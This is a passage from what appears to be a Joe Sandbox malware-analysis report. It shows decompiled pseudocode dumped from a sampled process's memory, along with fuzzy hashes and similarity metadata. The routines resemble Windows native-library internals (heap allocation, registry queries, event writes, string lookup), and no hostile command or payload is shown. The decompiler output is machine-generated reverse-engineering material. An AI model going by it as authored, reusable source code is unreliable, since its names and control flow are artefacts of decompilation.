                            										}
                            										_t111 = _v1056;
                            										__eflags = _t111 & 0x00000003;
                            										if((_t111 & 0x00000003) == 0) {
                            											_v1060 = _t118;
                            											__eflags = _t111;
                            											if(__eflags == 0) {
                            												goto L10;
                            											}
                            											_t42 = _t102 + 0xc; // 0xc
                            											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                            											_v1048 =  *((intOrPtr*)(_t102 + 8));
                            											_push(_t111);
                            											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                            											_push(0);
                            											_push( &_v1048);
                            											_t122 = E038013C0(_t102, _t118, _t122, __eflags);
                            											L44:
                            											_t118 = _v1072;
                            											goto L11;
                            										}
                            										_t122 = 0x80000002;
                            										goto L15;
                            									}
                            									_t122 = 0xc0000024;
                            									goto L44;
                            								}
                            								__eflags = _t114 - _t109;
                            								if(_t114 != _t109) {
                            									goto L59;
                            								}
                            								_t118 = 8;
                            								__eflags = _t77 - _t118;
                            								if(_t77 != _t118) {
                            									goto L34;
                            								}
                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                            								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                            									goto L34;
                            								}
                            								_t112 = _v1056;
                            								_v1060 = _t118;
                            								__eflags = _t112;
                            								if(_t112 == 0) {
                            									goto L10;
                            								}
                            								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                            								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                            								goto L11;
                            							}
                            							__eflags = _t114 - _t118;
                            							if(_t114 != _t118) {
                            								goto L59;
                            							}
                            							__eflags = _t77 - _t118;
                            							if(_t77 != _t118) {
                            								goto L34;
                            							}
                            							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                            							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                            								goto L34;
                            							}
                            							_t113 = _v1056;
                            							_v1060 = _t118;
                            							__eflags = _t113;
                            							if(_t113 == 0) {
                            								goto L10;
                            							}
                            							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                            							goto L11;
                            						}
                            						_t118 =  *((intOrPtr*)(_t102 + 8));
                            						__eflags = _t118 - _a20;
                            						if(_t118 <= _a20) {
                            							_t114 =  *(_t102 + 4);
                            							_t77 = _t118;
                            							goto L26;
                            						}
                            						_v1060 = _t118;
                            						goto L10;
                            					}
                            					__eflags = _t122 - 0x80000005;
                            					if(_t122 != 0x80000005) {
                            						goto L15;
                            					}
                            					L037E77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                            					L18:
                            					_t121 = _v1060;
                            					goto L19;
                            				}
                            				_push( &_v1060);
                            				_push(0x400);
                            				_t102 =  &_v1036;
                            				_push(_t102);
                            				_push(2);
                            				_push( &_v1048);
                            				_push(_t116);
                            				_t122 = E03809650();
                            				if(_t122 >= 0) {
                            					__eflags = 0;
                            					_v1052 = 0;
                            					goto L7;
                            				}
                            				if(_t122 == 0x80000005) {
                            					goto L18;
                            				}
                            				goto L4;
                            			}











































                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b4d393ed899f9d461d03bb7316a9d44db7f28e41b4dba8ab60f8d9859ccc0123
                            • Instruction ID: 301f5cd9fb45546c5879aa3e57c9257c473186f8b02056b3992a5884c3475ba5
                            • Opcode Fuzzy Hash: b4d393ed899f9d461d03bb7316a9d44db7f28e41b4dba8ab60f8d9859ccc0123
                            • Instruction Fuzzy Hash: 16818EB56042469BDB25CE94C880B6AB3E8EB86354F2849EEFD45DB340D335DD41CBE2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E03846DC9(signed int __ecx, void* __edx) {
                            				unsigned int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				char _v60;
                            				void* _t87;
                            				void* _t95;
                            				signed char* _t96;
                            				signed int _t107;
                            				signed int _t136;
                            				signed char* _t137;
                            				void* _t157;
                            				void* _t161;
                            				void* _t167;
                            				intOrPtr _t168;
                            				void* _t174;
                            				void* _t175;
                            				signed int _t176;
                            				void* _t177;
                            
                            				_t136 = __ecx;
                            				_v44 = 0;
                            				_t167 = __edx;
                            				_v40 = 0;
                            				_v36 = 0;
                            				_v32 = 0;
                            				_v60 = 0;
                            				_v56 = 0;
                            				_v52 = 0;
                            				_v48 = 0;
                            				_v16 = __ecx;
                            				_t87 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                            				_t175 = _t87;
                            				if(_t175 != 0) {
                            					_t11 = _t175 + 0x30; // 0x30
                            					 *((short*)(_t175 + 6)) = 0x14d4;
                            					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                            					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                            					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                            					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                            					E03846B4C(_t167, _t11, 0x214,  &_v8);
                            					_v12 = _v8 + 0x10;
                            					_t95 = E037E7D50();
                            					_t137 = 0x7ffe0384;
                            					if(_t95 == 0) {
                            						_t96 = 0x7ffe0384;
                            					} else {
                            						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					}
                            					_push(_t175);
                            					_push(_v12);
                            					_push(0x402);
                            					_push( *_t96 & 0x000000ff);
                            					E03809AE0();
                            					_t87 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                            					_t176 = _v16;
                            					if((_t176 & 0x00000100) != 0) {
                            						_push( &_v36);
                            						_t157 = 4;
                            						_t87 = E0384795D( *((intOrPtr*)(_t167 + 8)), _t157);
                            						if(_t87 >= 0) {
                            							_v24 = E0384795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                            							_v28 = E0384795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                            							_push( &_v52);
                            							_t161 = 5;
                            							_t168 = E0384795D( *((intOrPtr*)(_t167 + 8)), _t161);
                            							_v20 = _t168;
                            							_t107 = L037E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                            							_v16 = _t107;
                            							if(_t107 != 0) {
                            								_v8 = _v8 & 0x00000000;
                            								 *(_t107 + 0x20) = _t176;
                            								 *((short*)(_t107 + 6)) = 0x14d5;
                            								_t47 = _t107 + 0x24; // 0x24
                            								_t177 = _t47;
                            								E03846B4C( &_v36, _t177, 0xc78,  &_v8);
                            								_t51 = _v8 + 4; // 0x4
                            								_t178 = _t177 + (_v8 >> 1) * 2;
                            								_v12 = _t51;
                            								E03846B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                            								_v12 = _v12 + _v8;
                            								E03846B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                            								_t125 = _v8;
                            								_v12 = _v12 + _v8;
                            								E03846B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                            								_t174 = _v12 + _v8;
                            								if(E037E7D50() != 0) {
                            									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            								}
                            								_push(_v16);
                            								_push(_t174);
                            								_push(0x402);
                            								_push( *_t137 & 0x000000ff);
                            								E03809AE0();
                            								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                            								_t168 = _v20;
                            							}
                            							_t87 = L037E2400( &_v36);
                            							if(_v24 >= 0) {
                            								_t87 = L037E2400( &_v44);
                            							}
                            							if(_t168 >= 0) {
                            								_t87 = L037E2400( &_v52);
                            							}
                            							if(_v28 >= 0) {
                            								return L037E2400( &_v60);
                            							}
                            						}
                            					}
                            				}
                            				return _t87;
                            			}
































                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                            • Instruction ID: e560209d92c277844dedfdb31523e803a7926cf8f9f3d3dd3ce9585d5a919d77
                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                            • Instruction Fuzzy Hash: A7718F75A00209EFCB11DFA8C944EAEFBB9FF48704F144569E504EB650E734EA41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 39%
                            			E0385B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                            				char _v8;
                            				signed int _v12;
                            				signed int _t80;
                            				signed int _t83;
                            				intOrPtr _t89;
                            				signed int _t92;
                            				signed char _t106;
                            				signed int* _t107;
                            				intOrPtr _t108;
                            				intOrPtr _t109;
                            				signed int _t114;
                            				void* _t115;
                            				void* _t117;
                            				void* _t119;
                            				void* _t122;
                            				signed int _t123;
                            				signed int* _t124;
                            
                            				_t106 = _a12;
                            				if((_t106 & 0xfffffffc) != 0) {
                            					return 0xc000000d;
                            				}
                            				if((_t106 & 0x00000002) != 0) {
                            					_t106 = _t106 | 0x00000001;
                            				}
                            				_t109 =  *0x38b7b9c; // 0x0
                            				_t124 = L037E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                            				if(_t124 != 0) {
                            					 *_t124 =  *_t124 & 0x00000000;
                            					_t124[1] = _t124[1] & 0x00000000;
                            					_t124[4] = _t124[4] & 0x00000000;
                            					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                            						L13:
                            						_push(_t124);
                            						if((_t106 & 0x00000002) != 0) {
                            							_push(0x200);
                            							_push(0x28);
                            							_push(0xffffffff);
                            							_t122 = E03809800();
                            							if(_t122 < 0) {
                            								L33:
                            								if((_t124[4] & 0x00000001) != 0) {
                            									_push(4);
                            									_t64 =  &(_t124[1]); // 0x4
                            									_t107 = _t64;
                            									_push(_t107);
                            									_push(5);
                            									_push(0xfffffffe);
                            									E038095B0();
                            									if( *_t107 != 0) {
                            										_push( *_t107);
                            										E038095D0();
                            									}
                            								}
                            								_push(_t124);
                            								_push(0);
                            								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                            								L37:
                            								L037E77F0();
                            								return _t122;
                            							}
                            							_t124[4] = _t124[4] | 0x00000002;
                            							L18:
                            							_t108 = _a8;
                            							_t29 =  &(_t124[0x105]); // 0x414
                            							_t80 = _t29;
                            							_t30 =  &(_t124[5]); // 0x14
                            							_t124[3] = _t80;
                            							_t123 = 0;
                            							_t124[2] = _t30;
                            							 *_t80 = _t108;
                            							if(_t108 == 0) {
                            								L21:
                            								_t112 = 0x400;
                            								_push( &_v8);
                            								_v8 = 0x400;
                            								_push(_t124[2]);
                            								_push(0x400);
                            								_push(_t124[3]);
                            								_push(0);
                            								_push( *_t124);
                            								_t122 = E03809910();
                            								if(_t122 != 0xc0000023) {
                            									L26:
                            									if(_t122 != 0x106) {
                            										L40:
                            										if(_t122 < 0) {
                            											L29:
                            											_t83 = _t124[2];
                            											if(_t83 != 0) {
                            												_t59 =  &(_t124[5]); // 0x14
                            												if(_t83 != _t59) {
                            													L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                            												}
                            											}
                            											_push( *_t124);
                            											E038095D0();
                            											goto L33;
                            										}
                            										 *_a16 = _t124;
                            										return 0;
                            									}
                            									if(_t108 != 1) {
                            										_t122 = 0;
                            										goto L40;
                            									}
                            									_t122 = 0xc0000061;
                            									goto L29;
                            								} else {
                            									goto L22;
                            								}
                            								while(1) {
                            									L22:
                            									_t89 =  *0x38b7b9c; // 0x0
                            									_t92 = L037E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                            									_t124[2] = _t92;
                            									if(_t92 == 0) {
                            										break;
                            									}
                            									_t112 =  &_v8;
                            									_push( &_v8);
                            									_push(_t92);
                            									_push(_v8);
                            									_push(_t124[3]);
                            									_push(0);
                            									_push( *_t124);
                            									_t122 = E03809910();
                            									if(_t122 != 0xc0000023) {
                            										goto L26;
                            									}
                            									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                            								}
                            								_t122 = 0xc0000017;
                            								goto L26;
                            							}
                            							_t119 = 0;
                            							do {
                            								_t114 = _t124[3];
                            								_t119 = _t119 + 0xc;
                            								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                            								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                            								_t123 = _t123 + 1;
                            								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                            							} while (_t123 < _t108);
                            							goto L21;
                            						}
                            						_push(0x28);
                            						_push(3);
                            						_t122 = E037CA7B0();
                            						if(_t122 < 0) {
                            							goto L33;
                            						}
                            						_t124[4] = _t124[4] | 0x00000001;
                            						goto L18;
                            					}
                            					if((_t106 & 0x00000001) == 0) {
                            						_t115 = 0x28;
                            						_t122 = E0385E7D3(_t115, _t124);
                            						if(_t122 < 0) {
                            							L9:
                            							_push(_t124);
                            							_push(0);
                            							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                            							goto L37;
                            						}
                            						L12:
                            						if( *_t124 != 0) {
                            							goto L18;
                            						}
                            						goto L13;
                            					}
                            					_t15 =  &(_t124[1]); // 0x4
                            					_t117 = 4;
                            					_t122 = E0385E7D3(_t117, _t15);
                            					if(_t122 >= 0) {
                            						_t124[4] = _t124[4] | 0x00000001;
                            						_v12 = _v12 & 0x00000000;
                            						_push(4);
                            						_push( &_v12);
                            						_push(5);
                            						_push(0xfffffffe);
                            						E038095B0();
                            						goto L12;
                            					}
                            					goto L9;
                            				} else {
                            					return 0xc0000017;
                            				}
                            			}





















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c3e72196ff98e16a93848a9a433d09bf7073fe57b69ab63f10567abd2c08ef0d
                            • Instruction ID: 10e45fc44350eba22ecaaf4f435475cd4ce6dd7a77597f933e4eef65bc313abd
                            • Opcode Fuzzy Hash: c3e72196ff98e16a93848a9a433d09bf7073fe57b69ab63f10567abd2c08ef0d
                            • Instruction Fuzzy Hash: D971FE36200705AFD723CFA9CC45F66BBA5EB54720F2845A8FA55CB2E0EB70E940CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 80%
                            			E037C52A5(char __ecx) {
                            				char _v20;
                            				char _v28;
                            				char _v29;
                            				void* _v32;
                            				void* _v36;
                            				void* _v37;
                            				void* _v38;
                            				void* _v40;
                            				void* _v46;
                            				void* _v64;
                            				void* __ebx;
                            				intOrPtr* _t49;
                            				signed int _t53;
                            				short _t85;
                            				signed int _t87;
                            				signed int _t88;
                            				signed int _t89;
                            				intOrPtr _t101;
                            				intOrPtr* _t102;
                            				intOrPtr* _t104;
                            				signed int _t106;
                            				void* _t108;
                            
                            				_t93 = __ecx;
                            				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                            				_push(_t88);
                            				_v29 = __ecx;
                            				_t89 = _t88 | 0xffffffff;
                            				while(1) {
                            					E037DEEF0(0x38b79a0);
                            					_t104 =  *0x38b8210; // 0x31d1cc0
                            					if(_t104 == 0) {
                            						break;
                            					}
                            					asm("lock inc dword [esi]");
                            					_t2 = _t104 + 8; // 0x28000000
                            					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
                            					E037DEB70(_t93, 0x38b79a0);
                            					if( *((char*)(_t108 + 0xf)) != 0) {
                            						_t101 =  *0x7ffe02dc;
                            						__eflags =  *(_t104 + 0x14) & 0x00000001;
                            						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                            							L9:
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_push(0x90028);
                            							_push(_t108 + 0x20);
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_t10 = _t104 + 4; // 0x0
                            							_push( *_t10);
                            							_t53 = E03809890();
                            							__eflags = _t53;
                            							if(_t53 >= 0) {
                            								__eflags =  *(_t104 + 0x14) & 0x00000001;
                            								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                            									E037DEEF0(0x38b79a0);
                            									 *((intOrPtr*)(_t104 + 8)) = _t101;
                            									E037DEB70(0, 0x38b79a0);
                            								}
                            								goto L3;
                            							}
                            							__eflags = _t53 - 0xc0000012;
                            							if(__eflags == 0) {
                            								L12:
                            								_t11 = _t104 + 0xe; // 0x1d1cd802
                            								_t13 = _t104 + 0xc; // 0x31d1ccd
                            								_t93 = _t13;
                            								 *((char*)(_t108 + 0x12)) = 0;
                            								__eflags = E037FF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
                            								if(__eflags >= 0) {
                            									L15:
                            									_t102 = _v28;
                            									 *_t102 = 2;
                            									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                            									E037DEEF0(0x38b79a0);
                            									__eflags =  *0x38b8210 - _t104; // 0x31d1cc0
                            									if(__eflags == 0) {
                            										__eflags =  *((char*)(_t108 + 0xe));
                            										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                            										 *0x38b8210 = _t102;
                            										_t32 = _t102 + 0xc; // 0x0
                            										 *_t95 =  *_t32;
                            										_t33 = _t102 + 0x10; // 0x0
                            										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                            										_t35 = _t102 + 4; // 0xffffffff
                            										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                            										if(__eflags != 0) {
                            											_t37 = _t104 + 0x10; // 0x20031d1c
                            											_t95 =  *((intOrPtr*)( *_t37));
                            											E03844888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
                            										}
                            										E037DEB70(_t95, 0x38b79a0);
                            										asm("lock xadd [esi], eax");
                            										if(__eflags == 0) {
                            											_t38 = _t104 + 4; // 0x0
                            											_push( *_t38);
                            											E038095D0();
                            											L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                            										}
                            										asm("lock xadd [esi], ebx");
                            										__eflags = _t89 == 1;
                            										if(_t89 == 1) {
                            											_t41 = _t104 + 4; // 0x0
                            											_push( *_t41);
                            											E038095D0();
                            											L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                            										}
                            										_t49 = _t102;
                            										L4:
                            										return _t49;
                            									}
                            									E037DEB70(_t93, 0x38b79a0);
                            									asm("lock xadd [esi], eax");
                            									if(__eflags == 0) {
                            										_t25 = _t104 + 4; // 0x0
                            										_push( *_t25);
                            										E038095D0();
                            										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                            										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                            									}
                            									 *_t102 = 1;
                            									asm("lock xadd [edi], eax");
                            									if(__eflags == 0) {
                            										_t28 = _t102 + 4; // 0xffffffff
                            										_push( *_t28);
                            										E038095D0();
                            										L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                            									}
                            									continue;
                            								}
                            								_t15 = _t104 + 0x10; // 0x20031d1c
                            								_t93 =  &_v20;
                            								_t17 = _t104 + 0xe; // 0x1d1cd802
                            								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
                            								_t85 = 6;
                            								_v20 = _t85;
                            								_t87 = E037FF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
                            								__eflags = _t87;
                            								if(_t87 < 0) {
                            									goto L3;
                            								}
                            								 *((char*)(_t108 + 0xe)) = 1;
                            								goto L15;
                            							}
                            							__eflags = _t53 - 0xc000026e;
                            							if(__eflags != 0) {
                            								goto L3;
                            							}
                            							goto L12;
                            						}
                            						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                            						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                            							goto L3;
                            						} else {
                            							goto L9;
                            						}
                            					}
                            					L3:
                            					_t49 = _t104;
                            					goto L4;
                            				}
                            				_t49 = 0;
                            				goto L4;
                            			}

























                            0x00000000
                            0x00000000
                            0x00000000
                            0x03820dfe
                            0x037c5303
                            0x037c5307
                            0x00000000
                            0x037c5309
                            0x00000000
                            0x037c5309
                            0x037c5307
                            0x037c52e9
                            0x037c52e9
                            0x00000000
                            0x037c52e9
                            0x037c530e
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a44e93d402653631b0ba20172093df576ad18a00198314fdf5e0c37e50ce0735
                            • Instruction ID: 406a5b5322543bb70cc4a6823685fa71a9ec635d5e7105313c4f81187bffdafc
                            • Opcode Fuzzy Hash: a44e93d402653631b0ba20172093df576ad18a00198314fdf5e0c37e50ce0735
                            • Instruction Fuzzy Hash: DB51BCB41057829FD721EFA9C845B27BBE8FF84710F14099EE4958B691E774E840CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037F2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                            				signed short* _v8;
                            				signed short* _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr* _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				short _t56;
                            				signed int _t57;
                            				intOrPtr _t58;
                            				signed short* _t61;
                            				intOrPtr _t72;
                            				intOrPtr _t75;
                            				intOrPtr _t84;
                            				intOrPtr _t87;
                            				intOrPtr* _t90;
                            				signed short* _t91;
                            				signed int _t95;
                            				signed short* _t96;
                            				intOrPtr _t97;
                            				intOrPtr _t102;
                            				signed int _t108;
                            				intOrPtr _t110;
                            				signed int _t111;
                            				signed short* _t112;
                            				void* _t113;
                            				signed int _t116;
                            				signed short** _t119;
                            				short* _t120;
                            				signed int _t123;
                            				signed int _t124;
                            				void* _t125;
                            				intOrPtr _t127;
                            				signed int _t128;
                            
                            				_t90 = __ecx;
                            				_v16 = __edx;
                            				_t108 = _a4;
                            				_v28 = __ecx;
                            				_t4 = _t108 - 1; // -1
                            				if(_t4 > 0x13) {
                            					L15:
                            					_t56 = 0xc0000100;
                            					L16:
                            					return _t56;
                            				}
                            				_t57 = _t108 * 0x1c;
                            				_v32 = _t57;
                            				_t6 = _t57 + 0x38b8204; // 0x0
                            				_t123 =  *_t6;
                            				_t7 = _t57 + 0x38b8208; // 0x38b8207
                            				_t8 = _t57 + 0x38b8208; // 0x38b8207
                            				_t119 = _t8;
                            				_v36 = _t123;
                            				_t110 = _t7 + _t123 * 8;
                            				_v24 = _t110;
                            				_t111 = _a4;
                            				if(_t119 >= _t110) {
                            					L12:
                            					if(_t123 != 3) {
                            						_t58 =  *0x38b8450; // 0x0
                            						if(_t58 == 0) {
                            							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                            						}
                            					} else {
                            						_t26 = _t57 + 0x38b821c; // 0x0
                            						_t58 =  *_t26;
                            					}
                            					 *_t90 = _t58;
                            					goto L15;
                            				} else {
                            					goto L2;
                            				}
                            				while(1) {
                            					_t116 =  *_t61 & 0x0000ffff;
                            					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                            					if(_t116 == _t128) {
                            						goto L18;
                            					}
                            					L5:
                            					if(_t116 >= 0x61) {
                            						if(_t116 > 0x7a) {
                            							_t97 =  *0x38b6d5c; // 0x7f870654
                            							_t72 =  *0x38b6d5c; // 0x7f870654
                            							_t75 =  *0x38b6d5c; // 0x7f870654
                            							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                            						} else {
                            							_t116 = _t116 - 0x20;
                            						}
                            					}
                            					if(_t128 >= 0x61) {
                            						if(_t128 > 0x7a) {
                            							_t102 =  *0x38b6d5c; // 0x7f870654
                            							_t84 =  *0x38b6d5c; // 0x7f870654
                            							_t87 =  *0x38b6d5c; // 0x7f870654
                            							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                            						} else {
                            							_t128 = _t128 - 0x20;
                            						}
                            					}
                            					if(_t116 == _t128) {
                            						_t61 = _v12;
                            						_t96 = _v8;
                            					} else {
                            						_t113 = _t116 - _t128;
                            						L9:
                            						_t111 = _a4;
                            						if(_t113 == 0) {
                            							_t115 =  &(( *_t119)[_t111 + 1]);
                            							_t33 =  &(_t119[1]); // 0x100
                            							_t120 = _a8;
                            							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                            							_t35 = _t95 - 1; // 0xff
                            							_t124 = _t35;
                            							if(_t120 == 0) {
                            								L27:
                            								 *_a16 = _t95;
                            								_t56 = 0xc0000023;
                            								goto L16;
                            							}
                            							if(_t124 >= _a12) {
                            								if(_a12 >= 1) {
                            									 *_t120 = 0;
                            								}
                            								goto L27;
                            							}
                            							 *_a16 = _t124;
                            							_t125 = _t124 + _t124;
                            							E0380F3E0(_t120, _t115, _t125);
                            							_t56 = 0;
                            							 *((short*)(_t125 + _t120)) = 0;
                            							goto L16;
                            						}
                            						_t119 =  &(_t119[2]);
                            						if(_t119 < _v24) {
                            							L2:
                            							_t91 =  *_t119;
                            							_t61 = _t91;
                            							_v12 = _t61;
                            							_t112 =  &(_t61[_t111]);
                            							_v8 = _t112;
                            							if(_t61 >= _t112) {
                            								break;
                            							} else {
                            								_t127 = _v16 - _t91;
                            								_t96 = _t112;
                            								_v20 = _t127;
                            								_t116 =  *_t61 & 0x0000ffff;
                            								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                            								if(_t116 == _t128) {
                            									goto L18;
                            								}
                            								goto L5;
                            							}
                            						} else {
                            							_t90 = _v28;
                            							_t57 = _v32;
                            							_t123 = _v36;
                            							goto L12;
                            						}
                            					}
                            					L18:
                            					_t61 =  &(_t61[1]);
                            					_v12 = _t61;
                            					if(_t61 >= _t96) {
                            						break;
                            					}
                            					_t127 = _v20;
                            				}
                            				_t113 = 0;
                            				goto L9;
                            			}


                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 73f6fc652232028542774da92226aa5f2255b602fcec3acd658728a83e5f31d6
                            • Instruction ID: 6e5393e9282511f4d0174e1c5cd204868fcaf0c74e2ed4e155a59b6563825f74
                            • Opcode Fuzzy Hash: 73f6fc652232028542774da92226aa5f2255b602fcec3acd658728a83e5f31d6
                            • Instruction Fuzzy Hash: C051C27AB00116CFCB14DF1CC4809BDB7B5FB88700719899AED46EB366E731AA41DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

